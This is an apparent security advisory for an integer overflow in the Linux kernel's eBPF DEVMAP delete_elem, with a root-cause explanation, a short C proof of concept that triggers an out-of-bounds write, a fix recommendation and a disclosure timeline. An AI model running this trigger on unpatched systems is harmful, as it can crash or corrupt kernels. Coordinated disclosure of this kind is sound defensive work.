Integer Overflow in eBPF DEVMAP map_delete_elem Leads to Out-of-Bounds

Summary

AF_XDP sockets provide a high-performance mechanism for packet processing within the kernel. This bug report describes an integer overflow vulnerability in the devmap_map_delete_elem (function) when handling eBPF (DEVMAP) maps, potentially leading to an out-of-bounds write and subsequent security risks.

Severity

Moderate - This vulnerability can allow an attacker to This could allow them to hijack the control flow of the kernel and execute arbitrary code with kernel privilege and or a denial of serivce.

Proof of Concept

In the dev_map_delete_elem function an unsigned integer (map->max_entries) is compared with a user-controlled signed integer (k). Due to implicit type conversion, a large unsigned value for map->max_entries can bypass the intended bounds check:

if (k >= map->max_entries)
return -EINVAL;

This allows k to hold a negative value (between -2147483648 and -2), which is then used as an array index in dtab->netdev_map[k], which results in an out-of-bounds access.

old_dev = unrcu_pointer(xchg(&dtab->netdev_map[k], NULL));
if (old_dev) {
	call_rcu(&old_dev->rcu, __dev_map_entry_free);
	atomic_dec((atomic_t *)&dtab->items);
}

The xchg operation can then be used to cause an out-of-bounds write. Moreover, the invalid old_dev passed to __dev_map_entry_free can lead to further memory corruption.

// compile with gcc -o map_poc map_poc.c -lbpf
#include <errno.h>
#include <linux/bpf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>
int main() {
  // Create a large enough BPF DEVMAP map
  int map_fd;
  union bpf_attr create_attr = {
      .map_type = BPF_MAP_TYPE_DEVMAP,
      .key_size = sizeof(int),
      .value_size = sizeof(int),
      .max_entries = 0x80000000 + 2,
  };
  map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &create_attr, sizeof(create_attr));
  if (map_fd < 0) {
    fprintf(stderr, "Failed to create BPF map: %s\n", strerror(errno));
    return 1;
  }
  // Delete an element from the map using syscall
  unsigned int key = 0x80000000 + 1;
  if (syscall(SYS_bpf, BPF_MAP_DELETE_ELEM,
              &(union bpf_attr){
                  .map_fd = map_fd,
                  .key = &key,
              },
              sizeof(union bpf_attr)) < 0) {
    fprintf(stderr, "Failed to delete element from BPF map: %s\n",
            strerror(errno));
    return 1;
  }
  close(map_fd);
  return 0;
}

Further Analysis

To create an DEVMAP map and delete elements from it a user typically requires the CAP_BPF capability. This capability grants the necessary privileges to load eBPF programs, create and manage BPF maps, and perform operations on them.
It's important to note that unprivileged users might still be able to exploit this vulnerability if they have access to:
A program or process that already has CAP_BPF: If a vulnerable program with CAP_BPF allows user input to influence the delete_elem functions, an unprivileged user could potentially exploit the integer overflow.

Recommendation

Change the data type of k to u32 to ensure consistent unsignedness in the comparison. This will prevent the negative overflow from bypassing the bounds check.

Timeline

Date reported: 10/30/2024
Date fixed: 12/10/2024
Date disclosed: 01/09/2025

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Integer Overflow in eBPF DEVMAP map_delete_elem Leads to Out-of-Bounds

Package

Affected versions

Patched versions

Description

Summary

Severity

Proof of Concept

Further Analysis

Recommendation

Timeline

Severity

CVSS overall score

CVSS v3 base metrics

CVSS v3 base metrics

CVE ID

Weaknesses

Credits